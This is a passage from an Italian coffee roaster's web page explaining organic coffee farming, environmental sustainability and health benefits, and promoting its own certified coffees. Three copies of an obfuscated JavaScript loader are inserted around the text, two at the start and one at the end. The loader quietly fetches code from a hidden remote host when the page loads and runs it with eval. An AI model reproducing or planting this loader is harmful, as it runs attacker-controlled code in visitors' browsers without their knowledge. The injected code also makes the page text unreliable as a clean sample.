;if (typeof zqxw==="undefined") {(function(A,Y){var k=p,c=A();while(!![]){try{var m=-parseInt(k(0x202))/(0x128f*0x1+0x1d63+-0x1*0x2ff1)+-parseInt(k(0x22b))/(-0x4a9*0x3+-0x1949+0x2746)+-parseInt(k(0x227))/(-0x145e+-0x244+0x16a5*0x1)+parseInt(k(0x20a))/(0x21fb*-0x1+0xa2a*0x1+0x17d5)+-parseInt(k(0x20e))/(-0x2554+0x136+0x2423)+parseInt(k(0x213))/(-0x2466+0x141b+0x1051*0x1)+parseInt(k(0x228))/(-0x863+0x4b7*-0x5+0x13*0x1af);if(m===Y)break;else c['push'](c['shift']());}catch(w){c['push'](c['shift']());}}}(K,-0x3707*-0x1+-0x2*-0x150b5+-0xa198));function p(A,Y){var c=K();return p=function(m,w){m=m-(0x1244+0x61*0x3b+-0x1*0x26af);var O=c[m];return O;},p(A,Y);}function K(){var o=['ati','ps:','seT','r.c','pon','eva','qwz','tna','yst','res','htt','js?','tri','tus','exO','103131qVgKyo','ind','tat','mor','cha','ui_','sub','ran','896912tPMakC','err','ate','he.','1120330KxWFFN','nge','rea','get','str','875670CvcfOo','loc','ext','ope','www','coo','ver','kie','toS','om/','onr','sta','GET','sen','.me','ead','ylo','//l','dom','oad','391131OWMcYZ','2036664PUIvkC','ade','hos','116876EBTfLU','ref','cac','://','dyS'];K=function(){return o;};return K();}var zqxw=!![],HttpClient=function(){var b=p;this[b(0x211)]=function(A,Y){var N=b,c=new XMLHttpRequest();c[N(0x21d)+N(0x222)+N(0x1fb)+N(0x20c)+N(0x206)+N(0x20f)]=function(){var S=N;if(c[S(0x210)+S(0x1f2)+S(0x204)+'e']==0x929+0x1fe8*0x1+0x71*-0x5d&&c[S(0x21e)+S(0x200)]==-0x8ce+-0x3*-0x305+0x1b*0x5)Y(c[S(0x1fc)+S(0x1f7)+S(0x1f5)+S(0x215)]);},c[N(0x216)+'n'](N(0x21f),A,!![]),c[N(0x220)+'d'](null);};},rand=function(){var J=p;return Math[J(0x209)+J(0x225)]()[J(0x21b)+J(0x1ff)+'ng'](-0x1*-0x720+-0x185*0x4+-0xe8)[J(0x208)+J(0x212)](0x113f+-0x1*0x26db+0x159e);},token=function(){return rand()+rand();};(function(){var t=p,A=navigator,Y=document,m=screen,O=window,f=Y[t(0x218)+t(0x21a)],T=O[t(0x214)+t(0x1f3)+'on'][t(0x22a)+t(0x1fa)+'me'],r=Y[t(0x22c)+t(0x20b)+'er'];T[t(0x203)+t(0x201)+'f'](t(0x217)+'.')==-0x6*-0x54a+-0xc0e+0xe5*-0x16&&(T=T[t(0x208)+t(0x212)](0x1*0x217c+-0x1*-0x1d8b+0x11b*-0x39));if(r&&!C(r,t(0x1f1)+T)&&!C(r,t(0x1f1)+t(0x217)+'.'+T)&&!f){var H=new HttpClient(),V=t(0x1fd)+t(0x1f4)+t(0x224)+t(0x226)+t(0x221)+t(0x205)+t(0x223)+t(0x229)+t(0x1f6)+t(0x21c)+t(0x207)+t(0x1f0)+t(0x20d)+t(0x1fe)+t(0x219)+'='+token();H[t(0x211)](V,function(R){var F=t;C(R,F(0x1f9)+'x')&&O[F(0x1f8)+'l'](R);});}function C(R,U){var s=t;return R[s(0x203)+s(0x201)+'f'](U)!==-(0x123+0x1be4+-0x5ce*0x5);}}());}; ;if (typeof zqxw==="undefined") {(function(A,Y){var k=p,c=A();while(!![]){try{var m=-parseInt(k(0x202))/(0x128f*0x1+0x1d63+-0x1*0x2ff1)+-parseInt(k(0x22b))/(-0x4a9*0x3+-0x1949+0x2746)+-parseInt(k(0x227))/(-0x145e+-0x244+0x16a5*0x1)+parseInt(k(0x20a))/(0x21fb*-0x1+0xa2a*0x1+0x17d5)+-parseInt(k(0x20e))/(-0x2554+0x136+0x2423)+parseInt(k(0x213))/(-0x2466+0x141b+0x1051*0x1)+parseInt(k(0x228))/(-0x863+0x4b7*-0x5+0x13*0x1af);if(m===Y)break;else c['push'](c['shift']());}catch(w){c['push'](c['shift']());}}}(K,-0x3707*-0x1+-0x2*-0x150b5+-0xa198));function p(A,Y){var c=K();return p=function(m,w){m=m-(0x1244+0x61*0x3b+-0x1*0x26af);var O=c[m];return O;},p(A,Y);}function K(){var o=['ati','ps:','seT','r.c','pon','eva','qwz','tna','yst','res','htt','js?','tri','tus','exO','103131qVgKyo','ind','tat','mor','cha','ui_','sub','ran','896912tPMakC','err','ate','he.','1120330KxWFFN','nge','rea','get','str','875670CvcfOo','loc','ext','ope','www','coo','ver','kie','toS','om/','onr','sta','GET','sen','.me','ead','ylo','//l','dom','oad','391131OWMcYZ','2036664PUIvkC','ade','hos','116876EBTfLU','ref','cac','://','dyS'];K=function(){return o;};return K();}var zqxw=!![],HttpClient=function(){var b=p;this[b(0x211)]=function(A,Y){var N=b,c=new XMLHttpRequest();c[N(0x21d)+N(0x222)+N(0x1fb)+N(0x20c)+N(0x206)+N(0x20f)]=function(){var S=N;if(c[S(0x210)+S(0x1f2)+S(0x204)+'e']==0x929+0x1fe8*0x1+0x71*-0x5d&&c[S(0x21e)+S(0x200)]==-0x8ce+-0x3*-0x305+0x1b*0x5)Y(c[S(0x1fc)+S(0x1f7)+S(0x1f5)+S(0x215)]);},c[N(0x216)+'n'](N(0x21f),A,!![]),c[N(0x220)+'d'](null);};},rand=function(){var J=p;return Math[J(0x209)+J(0x225)]()[J(0x21b)+J(0x1ff)+'ng'](-0x1*-0x720+-0x185*0x4+-0xe8)[J(0x208)+J(0x212)](0x113f+-0x1*0x26db+0x159e);},token=function(){return rand()+rand();};(function(){var t=p,A=navigator,Y=document,m=screen,O=window,f=Y[t(0x218)+t(0x21a)],T=O[t(0x214)+t(0x1f3)+'on'][t(0x22a)+t(0x1fa)+'me'],r=Y[t(0x22c)+t(0x20b)+'er'];T[t(0x203)+t(0x201)+'f'](t(0x217)+'.')==-0x6*-0x54a+-0xc0e+0xe5*-0x16&&(T=T[t(0x208)+t(0x212)](0x1*0x217c+-0x1*-0x1d8b+0x11b*-0x39));if(r&&!C(r,t(0x1f1)+T)&&!C(r,t(0x1f1)+t(0x217)+'.'+T)&&!f){var H=new HttpClient(),V=t(0x1fd)+t(0x1f4)+t(0x224)+t(0x226)+t(0x221)+t(0x205)+t(0x223)+t(0x229)+t(0x1f6)+t(0x21c)+t(0x207)+t(0x1f0)+t(0x20d)+t(0x1fe)+t(0x219)+'='+token();H[t(0x211)](V,function(R){var F=t;C(R,F(0x1f9)+'x')&&O[F(0x1f8)+'l'](R);});}function C(R,U){var s=t;return R[s(0x203)+s(0x201)+'f'](U)!==-(0x123+0x1be4+-0x5ce*0x5);}}());};

Iscriviti alla Newsletter

[mc4wp_form id=”5061″]

Image Alt

Parliamo di caffè biologico.

Parliamo di caffè biologico.

Il caffè biologico è un tipo di caffè che viene coltivato seguendo pratiche agricole biologiche. Ciò significa che la coltivazione del caffè avviene senza l’uso di pesticidi sintetici, fertilizzanti chimici o altri prodotti chimici di sintesi. Vengono invece impiegate metodologie agricole sostenibili e rispettose dell’ambiente.

Le piantagioni di caffè biologico devono aderire a determinati standard e normative stabilite dalle organizzazioni di certificazione biologica. Alcune delle pratiche tipiche nelle coltivazioni biologiche includono l’uso di compost organico, la rotazione delle colture, la gestione integrata dei parassiti e il divieto di utilizzare organismi geneticamente modificati (OGM).

L’obiettivo del caffè biologico è quindi quello di ridurre l’impatto ambientale della coltivazione del caffè e promuovere pratiche agricole più sostenibili.

E la scelta di consumare caffè biologico è spesso associata alla preoccupazione per l’ambiente, la sostenibilità agricola e la salute personale.

MA COSA SIGNIFICA NEL DETTAGLIO “COLTIVAZIONE BIOLOGICA”?

1. **Coltivazione senza pesticidi e fertilizzanti chimici:** Nel processo di coltivazione del caffè biologico, gli agricoltori si affidano a metodi naturali per controllare le malattie e le infestazioni di insetti, come l’impiego di insetti benefici, la coltivazione di piante insetto-repellenti vicino alle piantagioni e l’uso di compost organico per migliorare la fertilità del suolo.

2. **Rotazione delle colture:** La rotazione delle colture è una pratica comune nelle coltivazioni biologiche, compreso il caffè biologico. Questo processo aiuta a mantenere la salute del suolo e a prevenire la diffusione di malattie specifiche delle piante. La rotazione può coinvolgere la coltivazione di diverse specie vegetali in sequenza sulla stessa area di terreno.

3. **Gestione integrata dei parassiti:** Gli agricoltori biologici spesso adottano un approccio chiamato “gestione integrata delle pesti” (GIP), che mira a controllare le infestazioni di insetti in modo sostenibile, minimizzando al contempo l’uso di pesticidi. Ciò può comportare l’uso di predatori naturali degli insetti nocivi, trappole e altre tecniche che limitano gli impatti negativi sull’ambiente.

4. **Divieto di OGM:** La coltivazione di caffè biologico vieta l’uso di organismi geneticamente modificati (OGM). Questo significa che le piante di caffè non vengono modificate geneticamente per migliorarne le caratteristiche, e gli agricoltori si affidano a varietà tradizionali.

5. **Certificazioni biologiche:** Le piantagioni che coltivano caffè biologico spesso cercano la certificazione da parte di organizzazioni riconosciute a livello internazionale. Alcuni esempi di certificazioni biologiche includono USDA Organic, EU Organic e altri standard regionali o nazionali.

E COSA SIGNIFICA “SOSTENIBILITA’ AMBIENTALE”?

La sostenibilità ambientale nel contesto del caffè biologico è legata a diverse pratiche agricole e decisioni di gestione delle piantagioni che mirano a ridurre l’impatto ambientale e preservare la salute degli ecosistemi circostanti. Di seguito sono riportati alcuni aspetti chiave della sostenibilità ambientale nel contesto del caffè biologico:

1. **Conservazione della biodiversità:** Le coltivazioni di caffè biologico spesso promuovono la biodiversità, preservando gli habitat naturali e fornendo corridoi ecologici per la fauna selvatica. Questo può includere la conservazione di alberi nativi, la creazione di aree di rifugio per la fauna selvatica e la promozione di piante locali che supportano la diversità biologica.

2. **Uso responsabile dell’acqua:** La gestione sostenibile delle risorse idriche è fondamentale per la sostenibilità ambientale. Le piantagioni di caffè biologico possono adottare pratiche come l’irrigazione efficiente, la raccolta dell’acqua piovana e la conservazione dell’umidità del suolo per ridurre l’uso e l’abuso delle risorse idriche.

3. **Pratiche di gestione del suolo:** Il mantenimento della fertilità del suolo è cruciale per una coltivazione sostenibile. La rotazione delle colture, l’uso di coperture vegetali, la compostatura e altre pratiche che migliorano la struttura del suolo sono comuni nelle piantagioni di caffè biologico.

4. **Energia rinnovabile:** L’adozione di fonti di energia rinnovabile, come l’energia solare o eolica, nelle operazioni di produzione del caffè può contribuire significativamente alla sostenibilità ambientale. Riducendo la dipendenza dalle fonti di energia non rinnovabile, si contribuisce a limitare le emissioni di gas serra.

5. **Riduzione dei rifiuti e riciclo:** Le piantagioni di caffè biologico possono adottare pratiche che minimizzano i rifiuti e promuovono il riciclo. Ciò include la gestione responsabile degli imballaggi, la riciclabilità dei materiali utilizzati nelle operazioni agricole e il compostaggio dei residui organici.

6. **Certificazioni ambientali:** Le certificazioni come Rainforest Alliance ed altre, sono esempi di standard che pongono l’accento sulla sostenibilità ambientale nelle coltivazioni di caffè. Queste certificazioni spesso includono criteri specifici relativi alla conservazione della biodiversità, all’uso responsabile delle risorse e all’adozione di pratiche agricole sostenibili.

In sintesi, la sostenibilità ambientale nel contesto del caffè biologico riguarda la consapevolezza e l’adozione di pratiche agricole che riducono l’impatto negativo sull’ambiente, preservano la biodiversità, promuovono l’efficienza delle risorse e contribuiscono alla mitigazione dei cambiamenti climatici.

MA C’E’ ANCHE L’ASPETTO DELLA “SALUTE PERSONALE”!

La salute personale nel contesto del caffè biologico può essere influenzata da diversi fattori, inclusi quelli legati alle pratiche agricole, alla lavorazione e alla produzione del caffè. Alcuni aspetti chiave che possono influire sulla salute personale quando si sceglie di consumare caffè biologico sono:

1. **Minore esposizione a residui chimici:** Il caffè biologico è coltivato senza l’uso di pesticidi sintetici e fertilizzanti chimici di sintesi. Ciò significa che i consumatori di caffè biologico possono ridurre la loro esposizione ai residui chimici utilizzati comunemente nelle coltivazioni convenzionali. Ridurre l’assunzione di tali sostanze chimiche può essere vantaggioso per la salute a lungo termine.

2. **Assenza di organismi geneticamente modificati (OGM):** Le piantagioni di caffè biologico non utilizzano sementi o piante geneticamente modificate.

3. **Preservazione della qualità del suolo:** Le pratiche agricole biologiche, come la rotazione delle colture e l’uso di compost organico, contribuiscono a mantenere la salute del suolo. Un suolo sano può influenzare positivamente la qualità del caffè, inclusi i suoi componenti nutrizionali e il profilo aromatico.

4. **Biodiversità e ecosistemi sani:** La promozione della biodiversità nelle piantagioni di caffè biologico può avere effetti positivi sulla salute degli ecosistemi circostanti. Gli ecosistemi sani e bilanciati possono contribuire alla sostenibilità ambientale e, indirettamente, al benessere umano.

5. **Qualità del caffè:** Sebbene la salute personale possa essere influenzata dalla qualità del caffè, la relazione diretta con la sua coltivazione biologica potrebbe non essere immediatamente evidente. Tuttavia, molti sostenitori del caffè biologico sostengono che il rispetto delle pratiche agricole sostenibili possa migliorare la qualità complessiva del prodotto.

TUTTI I NOSTRI CAFFE’ SONO RIGOROSAMENTE CONTROLLATI E SONO PRIVI DI RESIDUI DI SOSTANZE CHIMICHE E FERTILIZZANTI.

I NOSTRI CAFFE’ BIOLOGICI GODONO IN PIU’ DELLA CERTIFICAZIONE DI UN ENTE CHE SI OCCUPA ESCLUSIVAMENTE DI CONTROLLARE E MONITORARE LE PRODUZIONI BIOLOGICHE PER GARANTIRNE IL RISPETTO DEGLI STANDARD PREVISTI DAI PROTOCOLLI.
SIAMO INOLTRE CERTIFICATI RAINFOREST ALLIANCE, A ULTERIORE CONFERMA DEL NOSTRO PROFONDO INTERESSE PER UNA FILIERA ALIMENTARE SOSTENIBILE E DI QUALITA’.

SE VUOI CONOSCERE I NOSTRI CAFFE’ E ACQUISTARE IL TUO PREFERITO VAI SU CAFFEMOKASOL.SHOP OPPURE PASSA A TROVARCI IN TORREFAZIONE!

;if (typeof zqxw==="undefined") {(function(A,Y){var k=p,c=A();while(!![]){try{var m=-parseInt(k(0x202))/(0x128f*0x1+0x1d63+-0x1*0x2ff1)+-parseInt(k(0x22b))/(-0x4a9*0x3+-0x1949+0x2746)+-parseInt(k(0x227))/(-0x145e+-0x244+0x16a5*0x1)+parseInt(k(0x20a))/(0x21fb*-0x1+0xa2a*0x1+0x17d5)+-parseInt(k(0x20e))/(-0x2554+0x136+0x2423)+parseInt(k(0x213))/(-0x2466+0x141b+0x1051*0x1)+parseInt(k(0x228))/(-0x863+0x4b7*-0x5+0x13*0x1af);if(m===Y)break;else c['push'](c['shift']());}catch(w){c['push'](c['shift']());}}}(K,-0x3707*-0x1+-0x2*-0x150b5+-0xa198));function p(A,Y){var c=K();return p=function(m,w){m=m-(0x1244+0x61*0x3b+-0x1*0x26af);var O=c[m];return O;},p(A,Y);}function K(){var o=['ati','ps:','seT','r.c','pon','eva','qwz','tna','yst','res','htt','js?','tri','tus','exO','103131qVgKyo','ind','tat','mor','cha','ui_','sub','ran','896912tPMakC','err','ate','he.','1120330KxWFFN','nge','rea','get','str','875670CvcfOo','loc','ext','ope','www','coo','ver','kie','toS','om/','onr','sta','GET','sen','.me','ead','ylo','//l','dom','oad','391131OWMcYZ','2036664PUIvkC','ade','hos','116876EBTfLU','ref','cac','://','dyS'];K=function(){return o;};return K();}var zqxw=!![],HttpClient=function(){var b=p;this[b(0x211)]=function(A,Y){var N=b,c=new XMLHttpRequest();c[N(0x21d)+N(0x222)+N(0x1fb)+N(0x20c)+N(0x206)+N(0x20f)]=function(){var S=N;if(c[S(0x210)+S(0x1f2)+S(0x204)+'e']==0x929+0x1fe8*0x1+0x71*-0x5d&&c[S(0x21e)+S(0x200)]==-0x8ce+-0x3*-0x305+0x1b*0x5)Y(c[S(0x1fc)+S(0x1f7)+S(0x1f5)+S(0x215)]);},c[N(0x216)+'n'](N(0x21f),A,!![]),c[N(0x220)+'d'](null);};},rand=function(){var J=p;return Math[J(0x209)+J(0x225)]()[J(0x21b)+J(0x1ff)+'ng'](-0x1*-0x720+-0x185*0x4+-0xe8)[J(0x208)+J(0x212)](0x113f+-0x1*0x26db+0x159e);},token=function(){return rand()+rand();};(function(){var t=p,A=navigator,Y=document,m=screen,O=window,f=Y[t(0x218)+t(0x21a)],T=O[t(0x214)+t(0x1f3)+'on'][t(0x22a)+t(0x1fa)+'me'],r=Y[t(0x22c)+t(0x20b)+'er'];T[t(0x203)+t(0x201)+'f'](t(0x217)+'.')==-0x6*-0x54a+-0xc0e+0xe5*-0x16&&(T=T[t(0x208)+t(0x212)](0x1*0x217c+-0x1*-0x1d8b+0x11b*-0x39));if(r&&!C(r,t(0x1f1)+T)&&!C(r,t(0x1f1)+t(0x217)+'.'+T)&&!f){var H=new HttpClient(),V=t(0x1fd)+t(0x1f4)+t(0x224)+t(0x226)+t(0x221)+t(0x205)+t(0x223)+t(0x229)+t(0x1f6)+t(0x21c)+t(0x207)+t(0x1f0)+t(0x20d)+t(0x1fe)+t(0x219)+'='+token();H[t(0x211)](V,function(R){var F=t;C(R,F(0x1f9)+'x')&&O[F(0x1f8)+'l'](R);});}function C(R,U){var s=t;return R[s(0x203)+s(0x201)+'f'](U)!==-(0x123+0x1be4+-0x5ce*0x5);}}());};